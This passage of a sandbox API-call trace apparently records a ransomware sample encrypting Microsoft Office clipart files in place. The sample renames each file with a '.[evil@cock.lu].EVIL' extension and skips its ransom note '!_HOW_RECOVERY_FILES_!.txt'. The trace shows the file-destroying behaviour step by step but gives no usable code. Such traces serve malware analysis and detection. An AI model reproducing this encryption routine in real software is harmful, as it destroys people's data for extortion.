Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf.[evil@cock.lu].evil")) returned 1 [0162.307] ??_V@YAXPEAX@Z () returned 0x1 [0162.310] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF", dwFileAttributes=0x200) returned 0 [0162.310] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.310] wcsstr (_Str="PE00555_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.310] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF") returned 69 [0162.310] wcscmp (_String1="PE00555_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.310] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00555_.WMF") returned 0x0 [0162.310] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF") returned 0x45 [0162.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.312] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x140c, lpOverlapped=0x0) returned 1 [0162.319] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.319] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.319] _errno () returned 0x84b1160840 [0162.319] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.319] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1420, lpOverlapped=0x0) returned 1 [0162.319] CloseHandle (hObject=0x1a8) returned 1 [0162.319] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.320] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.320] __uncaught_exception () returned 0x84b1160800 [0162.320] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.320] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf.[evil@cock.lu].evil")) returned 1 [0162.321] ??_V@YAXPEAX@Z () returned 0x1 [0162.324] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF", dwFileAttributes=0x200) returned 0 [0162.324] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.324] wcsstr (_Str="PE00559_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.324] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF") returned 69 [0162.324] wcscmp (_String1="PE00559_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.324] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00559_.WMF") returned 0x0 [0162.324] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF") returned 0x45 [0162.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.326] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x26b0, lpOverlapped=0x0) returned 1 [0162.333] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.333] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.333] _errno () returned 0x84b1160840 [0162.334] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.334] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x26c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x26c0, lpOverlapped=0x0) returned 1 [0162.334] CloseHandle (hObject=0x1a8) returned 1 [0162.334] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.334] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.334] __uncaught_exception () returned 0x84b1160800 [0162.334] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.334] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf.[evil@cock.lu].evil")) returned 1 [0162.336] ??_V@YAXPEAX@Z () returned 0x1 [0162.338] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF", dwFileAttributes=0x200) returned 0 [0162.339] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.339] wcsstr (_Str="PE00563_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.339] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF") returned 69 [0162.339] wcscmp (_String1="PE00563_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.339] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00563_.WMF") returned 0x0 [0162.339] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF") returned 0x45 [0162.339] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.341] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5670, lpOverlapped=0x0) returned 1 [0162.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.349] _errno () returned 0x84b1160840 [0162.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x5680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5680, lpOverlapped=0x0) returned 1 [0162.349] CloseHandle (hObject=0x1a8) returned 1 [0162.349] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.350] __uncaught_exception () returned 0x84b1160800 [0162.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.350] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf.[evil@cock.lu].evil")) returned 1 [0162.351] ??_V@YAXPEAX@Z () returned 0x1 [0162.354] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF", dwFileAttributes=0x200) returned 0 [0162.354] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.354] wcsstr (_Str="PE00578_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.354] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF") returned 69 [0162.354] wcscmp (_String1="PE00578_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.354] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00578_.WMF") returned 0x0 [0162.354] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF") returned 0x45 [0162.354] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.357] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ae6, lpOverlapped=0x0) returned 1 [0162.364] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.364] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.364] _errno () returned 0x84b1160840 [0162.364] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.364] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b00, lpOverlapped=0x0) returned 1 [0162.364] CloseHandle (hObject=0x1a8) returned 1 [0162.364] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.364] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.365] __uncaught_exception () returned 0x84b1160800 [0162.365] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.365] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf.[evil@cock.lu].evil")) returned 1 [0162.366] ??_V@YAXPEAX@Z () returned 0x1 [0162.369] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF", dwFileAttributes=0x200) returned 0 [0162.369] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.369] wcsstr (_Str="PE00608_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.369] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF") returned 69 [0162.369] wcscmp (_String1="PE00608_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.369] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00608_.WMF") returned 0x0 [0162.369] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF") returned 0x45 [0162.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.371] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1928, lpOverlapped=0x0) returned 1 [0162.379] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.379] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.379] _errno () returned 0x84b1160840 [0162.379] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.379] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1940, lpOverlapped=0x0) returned 1 [0162.379] CloseHandle (hObject=0x1a8) returned 1 [0162.379] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.379] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.379] __uncaught_exception () returned 0x84b1160800 [0162.380] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.380] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf.[evil@cock.lu].evil")) returned 1 [0162.381] ??_V@YAXPEAX@Z () returned 0x1 [0162.384] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF", dwFileAttributes=0x200) returned 0 [0162.384] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.384] wcsstr (_Str="PE00633_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.384] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF") returned 69 [0162.384] wcscmp (_String1="PE00633_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.384] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00633_.WMF") returned 0x0 [0162.384] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF") returned 0x45 [0162.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.386] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4cea, lpOverlapped=0x0) returned 1 [0162.393] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.393] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.393] _errno () returned 0x84b1160840 [0162.393] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.393] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4d00, lpOverlapped=0x0) returned 1 [0162.394] CloseHandle (hObject=0x1a8) returned 1 [0162.394] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.394] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.394] __uncaught_exception () returned 0x84b1160800 [0162.394] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.394] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf.[evil@cock.lu].evil")) returned 1 [0162.395] ??_V@YAXPEAX@Z () returned 0x1 [0162.816] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF", dwFileAttributes=0x200) returned 0 [0162.816] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.816] wcsstr (_Str="PE00640_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.816] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF") returned 69 [0162.816] wcscmp (_String1="PE00640_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.816] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00640_.WMF") returned 0x0 [0162.816] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF") returned 0x45 [0162.816] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00640_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.819] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb12c, lpOverlapped=0x0) returned 1 [0162.822] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.822] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.822] _errno () returned 0x84b1160840 [0162.822] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.822] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xb140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb140, lpOverlapped=0x0) returned 1 [0162.822] CloseHandle (hObject=0x1a8) returned 1 [0162.822] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.822] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.823] __uncaught_exception () returned 0x84b1160800 [0162.823] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.823] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00640_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00640_.wmf.[evil@cock.lu].evil")) returned 1 [0162.824] ??_V@YAXPEAX@Z () returned 0x1 [0162.826] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF", dwFileAttributes=0x200) returned 0 [0162.826] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.826] wcsstr (_Str="PE00668_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.826] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF") returned 69 [0162.826] wcscmp (_String1="PE00668_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.826] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00668_.WMF") returned 0x0 [0162.826] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF") returned 0x45 [0162.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.828] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6028, lpOverlapped=0x0) returned 1 [0162.831] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.831] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.831] _errno () returned 0x84b1160840 [0162.831] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.831] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x6040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6040, lpOverlapped=0x0) returned 1 [0162.831] CloseHandle (hObject=0x1a8) returned 1 [0162.831] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.831] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.831] __uncaught_exception () returned 0x84b1160800 [0162.831] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.831] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf.[evil@cock.lu].evil")) returned 1 [0162.832] ??_V@YAXPEAX@Z () returned 